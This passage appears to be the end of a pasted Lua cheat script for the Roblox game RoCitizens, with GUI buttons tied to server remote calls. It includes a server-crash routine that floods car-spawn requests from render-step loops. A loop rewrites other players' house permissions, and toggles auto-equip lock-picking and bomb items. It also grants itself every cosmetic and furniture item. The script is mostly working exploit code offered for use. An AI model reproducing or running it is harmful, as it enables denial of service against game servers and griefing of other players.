- MyPlr.PlayerGui.GameValues.CosmeticData.AddItem:Invoke(v.Name)
- end
- for _, v in next, RepStor.Hair:GetChildren() do
- MyPlr.PlayerGui.GameValues.CosmeticData.AddItem:Invoke(v.Name)
- end
- for _, v in next, RepStor.Hat:GetChildren() do
- MyPlr.PlayerGui.GameValues.CosmeticData.AddItem:Invoke(v.Name)
- end
- for _, v in next, RepStor.Glasses:GetChildren() do
- MyPlr.PlayerGui.GameValues.CosmeticData.AddItem:Invoke(v.Name)
- end
- end)
- RoCitizensGUI.Main.Functions.Func11.Furniture.MouseButton1Click:connect(function()
- local FurnGUI = MyPlr.PlayerGui.Main.Field.Panel2.Inventory.FurnitureFrame
- for _, v in next, RepStor.Furniture:GetChildren() do
- local Clo = v:clone()
- Clo.Parent = FurnGUI
- Clo.Visible = true
- print(Clo:GetFullName())
- end
- end)
- RoCitizensGUI.Main.Functions.Func12.HouseName.ClearTextOnFocus = false
- RoCitizensGUI.Main.Functions.Func12.HouseSave.MouseButton1Click:connect(function()
- SaveHouse(RoCitizensGUI.Main.Functions.Func12.HouseName.Text)
- end)
- RoCitizensGUI.Main.Functions.Func13.HouseName.ClearTextOnFocus = false
- RoCitizensGUI.Main.Functions.Func13.HouseLoad.MouseButton1Click:connect(function()
- LoadHouse(RoCitizensGUI.Main.Functions.Func13.HouseName.Text)
- end)
- RoCitizensGUI.Main.Functions.Func15.CrashB.MouseButton1Click:connect(function()
- local Hint = Instance.new("Hint", CoreGui)
- Hint.Text = "May take a few minutes to completely crash the server."
- for i = 0, 5 do
- Run:BindToRenderStep("HAX" .. i, Enum.RenderPriority.First.Value-1, function()
- ComRelay.Car.SpawnCar:InvokeServer({["SpawnLocation"] = "Dealership", ["CurrentSpecs"] = {["Hood"] = "Standard", ["Spoiler"] = "None", ["SpoilerColor"] = "Mid gray", ["PrimaryColor"] = "Medium blue", ["SkirtsColor"] = "Mid gray", ["Price"] = 4400, ["Initiate"] = false, ["Skirts"] = "None", ["Frame"] = "Intrepid", ["SecondaryColor"] = "Medium stone grey", ["RimColor"] = "Medium stone grey"}})
- end)
- end
- end)
- RoCitizensGUI.Main.Functions.Func16.AntiD.MouseButton1Click:connect(function()
- AntiHouseDestroy = not AntiHouseDestroy
- if AntiHouseDestroy then
- local GetHouse = FindHouse(MyPlr)
- if not GetHouse then
- return
- end
- -- v.Name, C, GetHouse, v.Item, v.Color
- local Furn = RepStor.FurnitureModels["SS_Wooden Sign"]
- AntiHouseStealSign = ComRelay.House.PlaceFurniture:InvokeServer(Furn.Name, CFrame.new(Vector3.new(0, -5, 0)), GetHouse, "Splinter Sale Wooden Sign", "Reddish brown")
- ComRelay.Interaction.EditSign:FireServer(AntiHouseStealSign, "can't steal house")
- local Hint = Instance.new("Hint", CoreGui)
- Hint.Text = "DO NOT DESTROY THE SIGN THAT WAS JUST SPAWNED IN."
- RoCitizensGUI.Main.Functions.Func16.AntiD.Text = "ON"
- RoCitizensGUI.Main.Functions.Func16.AntiD.TextColor3 = Color3.new(0, 1, 0)
- wait(8)
- Hint:Destroy()
- else
- ComRelay.House.RemoveFurniture:InvokeServer(AntiHouseStealSign)
- AntiHouseStealSign = nil
- RoCitizensGUI.Main.Functions.Func16.AntiD.Text = "OFF"
- RoCitizensGUI.Main.Functions.Func16.AntiD.TextColor3 = Color3.new(1, 0, 0)
- end
- end)
- UserInput.InputBegan:connect(function(input, ingui)
- if not ingui then
- if input.UserInputType == Enum.UserInputType.Keyboard then
- if input.KeyCode == Enum.KeyCode.P then
- RoCitizensGUI.Main.Visible = not RoCitizensGUI.Main.Visible
- end
- end
- end
- end)
- Plrs.PlayerRemoving:connect(function(Plr)
- if Plr == SelectedPlayer then
- SelectedPlayer = Plrs:GetPlayers()[math.random(1, #Plrs:GetPlayers())]
- RoCitizensGUI.Main.Players.Title.Text = "Current Selected Player: " .. SelectedPlayer.Name
- end
- end)
- coroutine.resume(coroutine.create(function()
- while true do
- if PermsExploit then
- for _, v in next, Plrs:GetPlayers() do
- if v ~= MyPlr then
- local House = FindHouse(v)
- if House then
- ComRelay.House.SetPermissions:FireServer(GeneratePermsTable(v), House)
- end
- end
- Run.RenderStepped:wait()
- end
- end
- if LockpickExploit then
- EquipItem("Lock Kit")
- end
- if ExplosivesExploit then
- EquipItem("Bomb")
- end
- wait(1)
- end
- end))
Add Comment
Please, Sign In to add comment